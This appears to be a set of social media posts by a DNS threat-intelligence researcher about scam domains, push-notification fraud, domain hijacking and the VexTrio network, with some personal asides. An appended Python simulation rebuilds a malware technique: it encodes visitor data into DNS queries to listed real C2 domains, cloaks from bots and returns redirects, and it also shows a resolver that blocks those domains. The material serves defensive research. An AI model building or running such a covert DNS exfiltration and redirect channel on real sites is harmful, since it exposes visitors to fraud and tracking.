Renée Burton

Love DNS and hunting the ever-changing adversary. Personal account. Reflects my views and propensity for sweating.
LinkedIn: https://www.linkedin.com/in/ren%C3%A9e-burton-b7161110b/

Fucking scammers.

Earlier this week I figured out that my mother-in-law's attempted scammer was running in Azure. 8thoctioserror3[.]z13[.]web[.]core[.]windows[.]net

Then her brother-in-law showed me text messages this afternoon from scammers trying to get his Bitcoin at Coinbase. Lovely.

Then our kiddo gets this lovely pop up trying to read restaurant reviews just now.

redinstantnews[.]shop

is yet again some #tds hiding in cloudflare likely running a ton of fraud.

#threatintel #scam #cybercrime #cybersecurity #infosec

The most controversial topic in Seattle might be outdoor cats, so a No Kings protest is like a city-wide block party drawing 90k people and lots of silliness.

At the April protests, white middle-aged women were way overrepresented ... this was not the case yesterday. I saw all ages, all colors, ... all kinds of diversity.

Super proud of #seattle #nokings #protest ... and fuck the furlough.

For the record, I have no position on outdoor cats. Too dicey.

JFC. Of course the Google News bullshit leads to push notifications: the parasite of the advertising world.

Decided to click on one of these amazing news articles from a live connection, and sure enough -- some crappy domain wants to send notifications.

The notifications that follow are all fake news so far... where they then caveat in the story that it's fake lol. Primary purpose seems to be getting ad revenue w/ tons of on-page crap, rather than a direct scam.

Domains I've seen so far seem to have lapsed and the actor grabbed them. No bueno, dudes.

Still completely baffled at how Google is delivering the initial "news" notification. Insights welcome.

Say no to push. Fng parasites.

#dns #threatintel #scam #adtech #fakenews #infosec #cybercrime #cybersecurity

This was a bit wild and I don't understand SEO or Google News well enough to grok the whole thing, but certainly got the DNS part lol.

An obviously fake news story about Trump stimulus came across a phone, but from Google - at least it seemed that way. I see these same fake stimulus lures all the time in the opt-in, scam-riddled push systems, but this was surprising.

Turns out a University organization had let their domain lapse and it seems it was almost instantly picked up by bad dudes.

There are now a ton of fake articles with clickbait titles. But the articles all qualify in the middle that they are fake. There's no ads on the page. You can leave a comment and email - who would do that?

I saw other sites citing this "news", so clearly a web of some kind. But I am clearly missing something. How did Google send this out? Presumably leveraging the University domain reputation, but as an ad? What's the goal of all these mea culpa fake sites?

The one thing I know for sure is: don't drop your domain. That bad guy now has access to your emails.

#threatintel #dns #cybercrime #scam #seo #adtech #cybersecurity #infosec

Oh look-see, a Swiss ASN providing services for Russian cybercriminals running crypto theft / scam operations with malicious browser plugins. Research by Koi, who call this operator GreedyBear.

Several months ago, GreedyBear started delivering a bitcoin mining scam that I documented almost a year ago from my phone.

Mine was at globalminingbit[.]top on Proton66. I have a full 16 min video of the scam. This bitcoin mining scam appears to be a template. The one I experienced used u/o parameters.

According to Koi, GreedyBear has collected at least $1M. Data indicates GreedyBear is likely operating affiliate "advertising" where they feed the crypto scammers in Russian/BPH hosting space. From a Swiss network.

Shockingly, GreedyBear also redirected to these same bitcoin mining scams on Proton66 (different IP).... what a small world. So much to say, so little space.

Worth a read. I'd not heard of Koi before. They are former Israeli intel, so probably won't be pressured into taking shit down.

#threatintel #cybercrime #scam #malware #phishing #cybersecurity #infosec

https://www.koi.ai/blog/greedybear-650-attack-tools-one-coordinated-campaign

This was popular on LinkedIn so figured I'd share here... Honestly, I'm always a bit amazed how much people love things about DNS hijacking. Anyhooo...

Finding domain hijacking at scale is hard. We do a lot of it.

But finding examples of domain hijacks - specifically ones by Russian cybercriminals driving users into malicious adtech TDS is trivial.

Just search any porn related term and they will pop up. Various sports terms work well too. You can limit the results to microsoft, azure, s3, etc. and get even clearer results.

This is the same actor that hijacked the CDC subdomains back in March and that we wrote about a few months ago.

#dns #threatintel #cybercrime #scam #malware #cybersecurity #infosec #Infoblox

So it turns out I'm worth about 5 cents. But those pennies add up for the malicious adtech guyz to hundreds of dollars.

I'm somewhat obsessed with push notifications. They are such a brilliant way to persist on a hapless person's device. Over nearly a year of poking about my mom's sacrificial phone, I've been particularly impressed by:
* how little visibility security products have on the notification server domains,
* in combination with how much data they create. loads and loads.

But also the man in the middle gets to scam all the peeps. See... for every notification I see, they get to charge someone else for the impression. One network I was looking at last week has sent me over 1000 notifications... and they leak a lot of info about the auction, so I know they earned about $500 on those... but they also record that my conversion likelihood is near zero. They will send 4-6 notices all at once, so even if I were to engage, it's a crapshoot for the 4-6 bidders who paid to basically show the same lure.

And it's not just me... This network has several domains in the top 10k globally as ranked by Tranco... a few in the top 5k... That's a lot of queries! Probably each gaining 1-5 cents. Not bad.

Now for all of this to work, they need to show images. These are precious domains and servers for their business model.

And I'm a bit devilish. Wouldn't it be fun if everyone just blocked access to their image servers? I mean, we do. ;)

#scam #tds #threatintel #cybercrime #cybersecurity #infosec #dns #adtech #Infoblox

Scammers DO take vacations. Lots of them. These are social media from VexTrio key figures - tons more where these came from.

Don't blame the victim, blame the guy on a private jet to a Coldplay concert. fr fr.

#threatintel #cybercrime #cybersecurity #infosec #scam #VexTrio #tds #malware #phishing

VexTrio's origins come from two distinct groups: an Italian group we can date back to 2004 and a Russian-speaking Eastern European group. The Italians were quite successful early on, with a dating app that was among the fastest growing on Facebook in 2012. But our guess is that their profits slid in the years that followed. In 2020, there is a merger-acquisition which leaves the Eastern Europeans in charge. They gain the trademarks, knowledge in spam distribution, and who knows what else.

While developers remain in Eastern Europe, VexTrio created business headquarters in Lugano, Switzerland. Including the existing AdsPro, which developed the Los Pollos, Taco Loco, and Adtrafico traffic distribution systems (TDS) through their software company HolaCode. (OK, it's more complicated than that, but this is the CliffsNotes version.) We have identified nearly 100 businesses associated with 8 key figures in many industries, including construction, energy, and advertising.

So in the end, what is VexTrio? It's hard to say. We originally used it to refer to the TDS. Nice clean lines... but now, for us it is all the people and their labyrinth of companies.

We spoke at BlackHat last week so if you have a briefings pass you can listen to that. Otherwise, find our research online and start your own investigation.

#dns #threatintel #scam #cybercrime #vextrio #infoblox #cybersecurity #infosec #malware #tds

snackable 3/N on VexTrio and the WordPress hackers. This one's a bit geeky. One type of malware that led to VexTrio exclusively until late-Nov 2024 uses DNS TXT records to retrieve a redirection.

This is a tricky bugger and gives the malware actor an easy way to change things up if they are disrupted. The C2 domain (a DNS nameserver) isn't observed and the calls happen server side. The DNS TXT record malware was first observed by Sucuri/GoDaddy in 2023.

A compromised website makes a DNS TXT query that encodes the visitor's information and receives a redirection encoded in the response. When DNS queries to the C2 are blocked in the website's network, the visitor is protected -- we have had customers with compromised websites who still protected their users as we blocked the DNS query.

This malware is stubborn and is tricky to get rid of... there are also bots that come through regularly and update the compromised servers.

We used 4.5 million DNS queries over a ~6-month period to understand how the C2 and redirect domains interrelated. What we found were two distinct clusters (this is the really geeky part) that indicate separate operations. Both use bulletproof hosting and/or Russian hosting, both were exclusively VexTrio, and both in late November switched to the Help TDS. They used a few different paths to get to VexTrio's Los Pollos links.

One of these clusters had not been previously reported to our knowledge.

What you see in this image is a composite view. The C2 for each cluster are:
* data-cheklo[.]world, cndatalos[.]com, data-infox[.]com
* logs-web[.]com, airlogs[.]net, webdmonitor[.]io, cloudstats[.]net, etc.
webdmonitor[.]io is still active.

#dns #threatintel #cybercrime #cybersecurity #infosec #malware #scam #VexTrio #tds
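The TXT-record channel described in the post above, as an added, runnable illustration that is not the malware's code and not part of the original post. It simulates both sides: the compromised site packs visitor details into the query name, the attacker's nameserver answers with a base64 redirect (and cloaks from bots), and a protective resolver in the web server's network refuses the C2 zones so the redirect never arrives. The zone names are the ones listed in the post; the encoding scheme (base32 labels in, base64 TXT out), the landing URL, and the visitor record are assumptions constructed for the example.

```python
import base64
import json
from typing import Optional

# Zones from the post. Everything else here (encoding, URLs, visitor data)
# is an assumption made for this example, not observed malware behaviour.
C2_ZONES = (
    "data-cheklo.world", "cndatalos.com", "data-infox.com",
    "logs-web.com", "airlogs.net", "webdmonitor.io", "cloudstats.net",
)


def encode_visitor(visitor: dict, zone: str) -> str:
    """Client side: pack visitor info into DNS labels under the C2 zone.

    Base32 is used because DNS names are case-insensitive; labels are cut at
    the 63-byte limit and the whole name is kept under 253 bytes.
    """
    blob = json.dumps(visitor, separators=(",", ":"), sort_keys=True).encode()
    b32 = base64.b32encode(blob).decode().rstrip("=").lower()
    labels = [b32[i:i + 63] for i in range(0, len(b32), 63)]
    qname = ".".join(labels + [zone])
    if len(qname) > 253:
        raise ValueError("query name too long; trim visitor fields")
    return qname


def decode_visitor(qname: str, zone: str) -> dict:
    """Server side: recover the visitor info from the query name."""
    if not qname.endswith("." + zone):
        raise ValueError("query is not under the C2 zone")
    b32 = "".join(qname[: -len(zone) - 1].split(".")).upper()
    b32 += "=" * (-len(b32) % 8)  # restore base32 padding
    return json.loads(base64.b32decode(b32))


class C2Nameserver:
    """Simulated attacker nameserver: answers TXT with a base64 redirect."""

    def __init__(self, zone: str, landing: str):
        self.zone, self.landing = zone, landing
        self.seen = []  # every visitor record that reached the attacker

    def txt(self, qname: str) -> list:
        visitor = decode_visitor(qname, self.zone)
        self.seen.append(visitor)
        ua = visitor.get("ua", "").lower()
        if "bot" in ua or "curl" in ua:
            return []  # cloaking: crawlers and scanners get no redirect
        url = f"{self.landing}?src={visitor.get('site', '')}&geo={visitor.get('geo', '')}"
        return [base64.b64encode(url.encode()).decode()]


class ProtectiveResolver:
    """Recursive resolver in the web server's network that drops C2 zones."""

    def __init__(self, upstream: C2Nameserver, blocked: tuple):
        self.upstream, self.blocked = upstream, blocked
        self.blocked_queries = 0

    def txt(self, qname: str) -> list:
        if any(qname == z or qname.endswith("." + z) for z in self.blocked):
            self.blocked_queries += 1
            return []  # refused: visitor data never leaves the network
        return self.upstream.txt(qname)


def fetch_redirect(resolver, visitor: dict, zone: str) -> Optional[str]:
    """Compromised site's server-side step: query TXT, decode the redirect."""
    answers = resolver.txt(encode_visitor(visitor, zone))
    if not answers:
        return None  # no answer means the visitor just gets the real page
    return base64.b64decode(answers[0]).decode()


if __name__ == "__main__":
    # Constructed sample visitor; the landing URL is a placeholder.
    visitor = {"ip": "203.0.113.7", "ua": "Mozilla/5.0 (Android)",
               "geo": "US", "site": "victim.example"}
    c2 = C2Nameserver("webdmonitor.io", "https://landing.invalid/go")
    print("unprotected:", fetch_redirect(c2, visitor, "webdmonitor.io"))
    safe = ProtectiveResolver(c2, C2_ZONES)
    print("DNS-blocked:", fetch_redirect(safe, visitor, "webdmonitor.io"))
```

The point the post makes falls out of the last two lines: the website stays compromised, but once the resolver it uses refuses the C2 zone the TXT lookup returns nothing, so the visitor is served the real page and their details are never exfiltrated. Note that the query leaves from the web server, not the browser, which is why endpoint tooling on the visitor's side never sees it.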